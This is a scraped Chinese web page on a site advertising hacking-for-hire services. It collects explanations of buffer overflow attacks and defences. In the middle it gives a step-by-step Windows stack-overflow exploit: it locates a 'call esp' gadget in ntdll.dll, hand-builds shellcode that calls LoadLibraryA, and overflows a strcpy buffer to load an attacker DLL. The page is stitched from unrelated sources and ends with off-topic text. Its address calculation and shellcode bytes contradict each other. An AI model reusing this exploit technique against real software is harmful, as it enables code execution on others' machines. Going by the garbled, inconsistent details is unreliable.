黑客24小时在线接单网站

破解系统,专业黑客,黑客业务,渗透接单,黑客网站

黑客缓冲区溢出解决方案(缓冲区溢出的漏洞)

本文目录一览:

缓冲区溢出攻击的6.防范方法

有四种基本的方法保护缓冲区免受缓冲区溢出的攻击和影响。

1、通过操作系统使得缓冲区不可执行,从而阻止攻击者植入攻击代码。

2、强制写正确的代码的方法。

3、利用编译器的边界检查来实现缓冲区的保护。这个方法使得缓冲区溢出不可能出现,从而完全消除了缓冲区溢出的威胁,但是相对而言代价比较大。

4、一种间接的方法,这个方法在程序指针失效前进行完整性检查。虽然这种方法不能使得所有的缓冲区溢出失效,但它能阻止绝大多数的缓冲区溢出攻击。分析这种保护方法的兼容性和性能优势。

非执行的缓冲区

通过使被攻击程序的数据段地址空间不可执行,从而使得攻击者不可能执行被植入被攻击程序输入缓冲区的代码,这种技术被称为非执行的缓冲区技术。在早期的Unix系统设计中,只允许程序代码在代码段中执行。

但是Unix和MS Windows系统由于要实现更好的性能和功能,往往在数据段中动态地放入可执行的代码,这也是缓冲区溢出的根源。为了保持程序的兼容性,不可能使得所有程序的数据段不可执行。

但是可以设定堆栈数据段不可执行,这样就可以保证程序的兼容性。Linux和Solaris都发布了有关这方面的内核补丁。因为几乎没有任何合法的程序会在堆栈中存放代码,这种做法几乎不产生任何兼容性问题,除了在Linux中的两个特例,这时可执行的代码必须被放入堆栈中:

⑴信号传递

Linux通过向进程堆栈释放代码然后引发中断来执行在堆栈中的代码来实现向进程发送Unix信号。非执行缓冲区的补丁在发送信号的时候是允许缓冲区可执行的。

⑵GCC的在线重用

研究发现gcc在堆栈区里放置了可执行的代码作为在线重用之用。然而,关闭这个功能并不产生任何问题,只有部分功能似乎不能使用。

非执行堆栈的保护可以有效地对付把代码植入自动变量的缓冲区溢出攻击,而对于其它形式的攻击则没有效果。通过引用一个驻留的程序的指针,就可以跳过这种保护措施。其它的攻击可以采用把代码植入堆或者静态数据段中来跳过保护。

扩展资料:

原理

通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,使程序转而执行其它指令,以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。

例如下面程序:

void function(char*str){char buffer[16];strcpy(buffer,str);}

上面的strcpy()将直接把str中的内容copy到buffer中。这样只要str的长度大于16,就会造成buffer的溢出,使程序运行出错。

存在像strcpy这样的问题的标准函数还有strcat()、sprintf()、vsprintf()、gets()、scanf()等。

当然,随便往缓冲区中填东西造成它溢出一般只会出现分段错误(Segmentation fault),而不能达到攻击的目的。最常见的手段是通过制造缓冲区溢出使程序运行一个用户shell,再通过shell执行其它命令。

如果该程序属于root且有suid权限的话,攻击者就获得了一个有root权限的shell,可以对系统进行任意操作了。

缓冲区溢出攻击之所以成为一种常见安全攻击手段其原因在于缓冲区溢出漏洞太普遍了,并且易于实现。

而且,缓冲区溢出成为远程攻击的主要手段其原因在于缓冲区溢出漏洞给予了攻击者他所想要的一切:植入并且执行攻击代码。被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序,从而得到被攻击主机的控制权。

在1998年Lincoln实验室用来评估入侵检测的的5种远程攻击中,有2种是缓冲区溢出。而在1998年CERT的13份建议中,有9份是是与缓冲区溢出有关的,在1999年,至少有半数的建议是和缓冲区溢出有关的。在ugtraq的调查中,有2/3的被调查者认为缓冲区溢出漏洞是一个很严重的安全问题。

缓冲区溢出漏洞和攻击有很多种形式,会在第二节对他们进行描述和分类。相应地防卫手段也随者攻击方法的不同而不同,将在第四节描述,它的内容包括针对每种攻击类型的有效的防卫手段。

参考资料:

百度百科——缓冲区溢出攻击

如何应对缓冲区溢出漏洞攻击?

1999年,至少有半数的建议与缓冲区溢出有关,目前公开的安全漏洞通告也有相当一部分属于 缓冲区溢出漏洞。 缓冲区溢出攻击利用了目标程序的缓冲区溢出漏洞,通过操作目标程序堆栈并暴力改写其返回地址,从而获得目标控制权。它的原理是:向一个有限空间的缓冲区中拷贝过长的字符串,这带来两种后果,一是过长的字符串覆盖了相临的存储单元而造成程序瘫痪,甚至造成宕机、系统或进程重启等;二是可让攻击者运行恶意代码,执行任意指令,甚至获得超级权限等。 事实上,在网络空间中利用这种缓冲区溢出漏洞而发起的攻击屡见不鲜。早在1988年,美国康奈尔大学的计算机科学系研究生,23岁的莫里斯利用Unix fingered程序不限制输入长度的漏洞,输入512个字符后使缓冲器溢出。莫里斯又写了一段特别大的程序使他的恶意程序能以root(根)身份执行,并感染到其他机器上。年初名燥一时的“SQL Slammer”蠕虫王的发作原理,就是利用未及时更新补丁的MS SQL Server数据库缓冲区溢出漏洞,采用不正确的方式将数据发到MS SQL Server的监听端口,这个错误可以引起缓冲溢出攻击。攻击代码通过缓冲溢出获得非法权限后,被攻击主机上的Sqlserver.exe进程会尝试向随机的IP地址不断发送攻击代码,感染其他机器,最终形成UDP Flood,造成网络堵塞甚至瘫痪。 由上可知,缓冲区溢出攻击通常是在一个字符串里综合了代码植入和激活纪录。如攻击者将目标定为具有溢出漏洞的自动变量,然后向程序传递超长的字符串,进而引发缓冲区溢出。经过精巧设计的攻击代码以一定的权限运行漏洞程序,获得目标主机的控制权。这种攻击手段屡次得逞主要是利用了程序中边境条件、函数指针等设计不当问题,即利用了C程序本身的不安全性。大多数Windows、Linux、Unix系列的开发都依赖于C语言,所以缓冲区溢出攻击成为操作系统、数据库等应用程序最普遍的漏洞之一。 值得关注的是,防火墙对这种攻击方式无能为力,因为攻击者传输的数据分组并无异常特征,没有任何欺骗(这就是Nimda、SQL Slammer可以顺利穿透防火墙的原因)。另外可以用来实施缓冲区溢出攻击的字符串非常多样化,无法与正常数据有效进行区分。缓冲区溢出攻击不是一种窃密和欺骗的手段,而是从计算机系统的最底层发起攻击,因此在它的攻击下系统的身份验证和访问权限等安全策略形同虚设。 用户及开发者该如何降低因缓冲区溢出而造成的攻击损失呢?首先,编程人员可以使用具有类型安全的语言 Java以避免C的缺陷;产品发布前仔细检查程序溢出情况;使用检查堆栈溢出的编译器等。作为普通用户或系统管理员,应及时为自己的操作系统和应用程序更新补丁;减少不必要的开放服务端口等,合理配置您的系统。

怎么进行缓冲区溢出攻击?

缓冲区溢出(又称堆栈溢出)攻击是最常用的黑客技术之一。这种攻击之所以泛滥,是由于开放源代码程序的本质决定的。Unix本身以及其上的许多应用程序都是用C语言编写的,而C语言不检查缓冲区的边界。在某些情况下,如果用户输入的数据长度超过应用程序给定的缓冲区,就会覆盖其他数据区,这就称作"缓冲区溢出"。 一般情况下,覆盖其他数据区的数据是没有意义的,最多造成应用程序错误;但是,如果输入的数据是经过"黑客"精心设计的,覆盖缓冲区的数据恰恰是黑客的入侵程序代码,黑客就获取了程序的控制权。尽管这项攻击的技术要求非常高,而一旦执行这项攻击的程序被设计出来却是非常简单的。由于缓冲区溢出是一个编程问题,所以他们只能通过修复被破坏的程序代码来解决问题。从"缓冲区溢出攻击"的原理可以看出,要防止此类攻击,我们可以在开放程序时仔细检查溢出情况,不允许数据溢出缓冲区。经常检查操作系统和应用程序提供商的站点,一旦发现补丁程序就马上下载是最好的方法。

如何利用缓冲区溢出的程序错误来运行黑客程序

上回说了,我们可以在一个有缓冲区溢出漏洞的程序中执行程序中其他的函数,当然,也可以执行程序中其他的指令。还是以上次讲过的程序为例:

程序A:

#include stdio.h

#include string.h

void foo(const char *input)

{

char buf[10];

strcpy(buf, input);

}

int main(int argc, char *argv[])

{

foo("1234567890123456123456123456");

return 0;

}

启动VS 2005,然后将断点设在函数foo中strcpy的后面,断点执行到了以后,进入反汇编窗口,单步执行到该函数最后一行汇编指令,也就是ret指令,在内存窗口中查看寄存器esp保存的内存地址所存放的值,当然你的内存窗口的显示方式应该是4字节显示方式(x86或者说是32位机器上)。你可以看到该值也已经被foo的参数12345678那些字符串覆盖了,然后你可以看看esp的值和ebp的值刚好相差8个字节。就是说,内存中的形式是这样的:

ebp的值 esp的值

^ ^

| |

--------------------------------------

| |函数返回地址| |

---------------------------------------

而你再看看foo函数最后几个汇编指令:非常标准的函数退出时,所作的栈销毁操作:

mov esp ebp

pop ebp

ret

在ret指令执行完成以后,esp的值就会是foo函数的ebp + 8。

如果我们在esp所指向的内存地址上存放我们的shell code(或者说是我们刻意编写的汇编代码),然后将函数返回地址更改为调用我们的shell code的地址,那么我们所编写的shell code也就会被执行,这时就可以干任何我们想干的事情了,;)。

下面是步骤:

1,编写一个dll,其实exe程序也可以,只不过方法略有不同,如果你是直接执行exe程序的话,可以使用WinExec。这里因为我要导入我编写的dll进入程序A,所以使用的WINAPI函数是LoadLibrary,LoadLibrary需要一个参数,指明要加载的dll的文件路径。

2. 在我编写的dll中,处理的事情很简单,就是启动一个程序,呵呵,下面是源代码:

#include

"stdafx.h"

#include stdio.h

#include windows.h

#ifdef _MANAGED

#pragma managed(push, off)

#endif

BOOL APIENTRY DllMain( HMODULE hModule,

DWORD ul_reason_for_call,

LPVOID lpReserved)

{

STARTUPINFO si;

PROCESS_INFORMATION pi;

ZeroMemory( si,

sizeof(si) );

si.cb = sizeof(si);

ZeroMemory( pi, sizeof(pi) );

switch ( ul_reason_for_call )

{

case DLL_PROCESS_ATTACH: // 每次一个新的进程加载该dll的时候,触发这个条件

WinExec("C://WINDOWS//notepad.exe", SW_SHOW);

break;

default:

break;

}

return TRUE;

}

#ifdef

_MANAGED

#pragma managed(pop)

#endif

3.为了调用LoadLibrary,我们需要写一些汇编指令,因为cpu执行的是机器码,而不是汇编指令,所以你要将汇编指令转换为机器码。转换很简单,在你的代码里面加上下面这几行:

int main()

{

_asm {

jmp esp

}

}

将断点设置在main函数的开始处,执行程序,程序中断后,去反汇编,你会看到类似下面的代码:

00401763 FF E4 jmp esp

00401763是这段汇编码在程序中的地址,FF E4就是jmp esp对应的机器码了。呵呵,如果没有FF E4出现的话,在反汇编窗口中右键单击,选择“Show Byte Code”(VS 2005英文版)。

现在腰调用esp中的地址,可以是jmp esp也可以是call esp,但是这个代码必须是进程中已有的,OK,我们在程序中找到这个地址。再次运行程序A,在main函数中设置断点,中断后,选择Debug -- Window -- Module查看这个程序所有加载的dll(无论是动态的还是静态加载的)。程序A中不出意外的话应该有kernel32.dll和ntdll.dll,还有可能有msvcrt8.dll。

我们找一下这些dll里面有没有对应的机器码,怎么找?怎么把一个dll反汇编?呵呵,VS 2005里面自己就带了一个反汇编工具:dumpbin,路经在C:/Program Files/Microsoft Visual Studio 8/VC/bin。dumpbin有一个选项/disasm就是将任何一个PE文件(DLL或EXE)反汇编

打开cmd窗口,执行dumpbin /disasm c:/windows/system32/kernel32.dll | findstr /c:"FF E4",哦哦,没有。再试ntdll.dll,还是没有。试一下call esp,它的机器吗是FF E5。kernel32.dll里面没有,啊哈,ntdll.dll里面有,这是搜索结果:

7C914393: FF E5 call esp

4.编写shell code,调用LoadLibrary,需要知道LoadLibrary函数的地址,获取的办法是这样的:LoadLibrary是在kernel32.dll中的,启动Depends.exe,Depends.exe包含在Windows SDK中,你也可以去网上搜一下,下载一个回来用,实在找不到,那我就牺牲一下自己啦。

随便用depends打开一个exe文件,在左上角的依赖树里面点击kernel32.dll,在右边第二个窗口中找到LoadLibraryA这个函数,可以看到它的Entry Point是0x000445EF,如下:

E | Ordinal | Hint | Function | Entry Point

---------------------------------------------------------------------------------------------

754 (0x02F2) | 753 (0x02F1) | LoadLibraryA | 0x000445EF

操作系统不一样,值可能不一样,在最下面的窗口中找到kernel32.dll的base address(Preferred Base)是0x77E00000,如下:

Module | ... 中间很多省略 ... | Preferred Base

-------------------------------------------------------------------------

Kernel32.dll | .... | 0x77E000000

将Kernel32.dll的Preferred Base和LoadLibraryA的Entry Point按位于就获得LoadLibraryA在你的程序中的地址是:0x77E445EF。

5。最后编写汇编代码执行你的黑客程序:

_asm {

mov eax 0x77E445EF // 将LoadLibraryA的地址存在eax寄存器中

call L4

L2: call eax // 调用LoadLibraryA,程序执行到这段指令时LoadLibraryA的参数已经压栈

L3: jmp L3 // 循环,确保被黑的程序不会死掉

L4: call L2

}

6。最后,示例程序如下:

#include

stdio.h

#include string.h

void func(char *p)

{

char stack_temp[20];

strcpy(stack_temp, p);

printf(stack_temp);

}

void foo()

{

printf("This should not be called");

}

int main(int argc, char *argv[])

{

func("I AM MORE THAN TWENTLONG/x93/x43/x91/x7C"

"/xB8/x77/x1D/x80/x7C" // mov eax 0x771D807C LoadLibraryA的地址

"/xEB/x04" // call L4

"/xFF/xD0" // L2: call eax

"/xEB/xFE" // L3: jmp L3

"/xE8/xF7/xFF/xFF/xFF" // L4: call L2

"c://hack.dll/0"); // LoadLibraryA的参数,也就是我们要刻意加载的dll文件

return 0;

}

完了,累死了

缓冲区溢出怎么处理

什么是缓冲区溢出

单的说就是程序对接受的输入数据没有进行有效的检测导致错误,后果可能造成程序崩溃或者执行攻击者的命令,详细的资料可以看unsecret.org的漏洞利用栏目 。

缓冲区溢出的概念

缓冲区溢出好比是将十磅的糖放进一个只能装五磅的容器里……

堆栈溢出(又称缓冲区溢出)攻击是最常用的黑客技术之一。我们知道,UNIX本身以及其上的许多应用程序都是用C语言编写的,C语言不检查缓冲区的边界。在某些情况下,如果用户输入的数据长度超过应用程序给定的缓冲区,就会覆盖其他数据区。这称作“堆栈溢出或缓冲溢出”。

一般情况下,覆盖其他数据区的数据是没有意义的,最多造成应用程序错误。但是,如果输入的数据是经过“黑客”精心设计的,覆盖堆栈的数据恰恰是黑客的入侵程序代码,黑客就获取了程序的控制权。如果该程序恰好是以root运行的,黑客就获得了root权限,然后他就可以编译黑客程序、留下入侵后门等,实施进一步地攻击。按照这种原理进行的黑客入侵就叫做“堆栈溢出攻击”。

为了便于理解,我们不妨打个比方。缓冲区溢出好比是将十磅的糖放进一个只能装五磅的容器里。一旦该容器放满了,余下的部分就溢出在柜台和地板上,弄得一团糟。由于计算机程序的编写者写了一些编码,但是这些编码没有对目的区域或缓冲区——五磅的容器——做适当的检查,看它们是否够大,能否完全装入新的内容——十磅的糖,结果可能造成缓冲区溢出的产生。如果打算被放进新地方的数据不适合,溢得到处都是,该数据也会制造很多麻烦。但是,如果缓冲区仅仅溢出,这只是一个问题。到此时为止,它还没有破坏性。当糖溢出时,柜台被盖住。可以把糖擦掉或用吸尘器吸走,还柜台本来面貌。与之相对的是,当缓冲区溢出时,过剩的信息覆盖的是计算机内存中以前的内容。除非这些被覆盖的内容被保存或能够恢复,否则就会永远丢失。

在丢失的信息里有能够被程序调用的子程序的列表信息,直到缓冲区溢出发生。另外,给那些子程序的信息——参数——也丢失了。这意味着程序不能得到足够的信息从子程序返回,以完成它的任务。就像一个人步行穿过沙漠。如果他依赖于他的足迹走回头路,当沙暴来袭抹去了这些痕迹时,他将迷失在沙漠中。这个问题比程序仅仅迷失方向严重多了。入侵者用精心编写的入侵代码(一种恶意程序)使缓冲区溢出,然后告诉程序依据预设的方法处理缓冲区,并且执行。此时的程序已经完全被入侵者操纵了。

入侵者经常改编现有的应用程序运行不同的程序。例如,一个入侵者能启动一个新的程序,发送秘密文件(支票本记录,口令文件,或财产清单)给入侵者的电子邮件。这就好像不仅仅是沙暴吹了脚印,而且后来者也会踩出新的脚印,将我们的迷路者领向不同的地方,他自己一无所知的地方。

缓冲区溢出的处理

你屋子里的门和窗户越少,入侵者进入的方式就越少……

由于缓冲区溢出是一个编程问题,所以只能通过修复被破坏的程序的代码而解决问题。如果你没有源代码,从上面“堆栈溢出攻击”的原理可以看出,要防止此类攻击,我们可以:

1、开放程序时仔细检查溢出情况,不允许数据溢出缓冲区。由于编程和编程语言的原因,这非常困难,而且不适合大量已经在使用的程序;

2、使用检查堆栈溢出的编译器或者在程序中加入某些记号,以便程序运行时确认禁止黑客有意造成的溢出。问题是无法针对已有程序,对新程序来讲,需要修改编译器;

3、经常检查你的操作系统和应用程序提供商的站点,一旦发现他们提供的补丁程序,就马上下载并且应用在系统上,这是最好的方法。但是系统管理员总要比攻击者慢一步,如果这个有问题的软件是可选的,甚至是临时的,把它从你的系统中删除。举另外一个例子,你屋子里的门和窗户越少,入侵者进入的方式就越少。

怎么解决缓冲区溢出的问题啊?``各位大侠请指点!谢了!!

缓冲区溢出是指当计算机程序向缓冲区内填充的数据位数超过了缓冲区本身的容量。溢出的数据覆盖在合法数据上。理想情况是,程序检查数据长度并且不允许输入超过缓冲区长度的字符串。但是绝大多数程序都会假设数据长度总是与所分配的存储空间相匹配,这就为缓冲区溢出埋下隐患。操作系统所使用的缓冲区又被称为堆栈,在各个操作进程之间,指令被临时存储在堆栈当中,堆栈也会出现缓冲区溢出。

当一个超长的数据进入到缓冲区时,超出部分就会被写入其他缓冲区,其他缓冲区存放的可能是数据、下一条指令的指针,或者是其他程序的输出内容,这些内容都被覆盖或者破坏掉。可见一小部分数据或者一套指令的溢出就可能导致一个程序或者操作系统崩溃。

缓冲区溢出是由编程错误引起的。如果缓冲区被写满,而程序没有去检查缓冲区边界,也没有停止接收数据,这时缓冲区溢出就会发生。缓冲区边界检查被认为是不会有收益的管理支出,计算机资源不够或者内存不足是编程者不编写缓冲区边界检查语句的理由,然而摩尔定律已经使这一理由失去了存在的基础,但是多数用户仍然在主要应用中运行十年甚至二十年前的程序代码。

缓冲区溢出之所以泛滥,是由于开放源代码程序的本质决定的。一些编程语言对于缓冲区溢出是具有免疫力的,例如Perl能够自动调节字节排列的大小,Ada95能够检查和阻止缓冲区溢出。但是被广泛使用的C语言却没有建立检测机制。标准C语言具有许多复制和添加字符串的函数,这使得标准C语言很难进行边界检查。C++略微好一些,但是仍然存在缓冲区溢出。一般情况下,覆盖其他数据区的数据是没有意义的,最多造成应用程序错误,但是,如果输入的数据是经过“黑客”或者病毒精心设计的,覆盖缓冲区的数据恰恰是“黑客”或者病毒的入侵程序代码,一旦多余字节被编译执行,“黑客”或者病毒就有可能为所欲为,获取系统的控制权。

使用一组或多组附加驱动器存储数据的副本,这就叫数据冗余技术。比如镜像就是一种数据冗余技术。

  • 评论列表:
  •  黑客技术
     发布于 2022-07-04 19:03:02  回复该评论
  • 组或多组附加驱动器存储数据的副本,这就叫数据冗余技术。比如镜像就是一种数据冗余技术。
  •  黑客技术
     发布于 2022-07-04 12:32:24  回复该评论
  • Base和LoadLibraryA的Entry Point按位于就获得LoadLibraryA在你的程序中的地址是:0x77E445EF。5。最后编写汇编代码执行你的黑客程序: _asm
  •  黑客技术
     发布于 2022-07-04 19:47:52  回复该评论
  • 行的是机器码,而不是汇编指令,所以你要将汇编指令转换为机器码。转换很简单,在你的代码里面加上下面这几行:int main(){ _asm { jmp esp }}将断点设置在main函数的开始处,执行程序,程序中断后

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.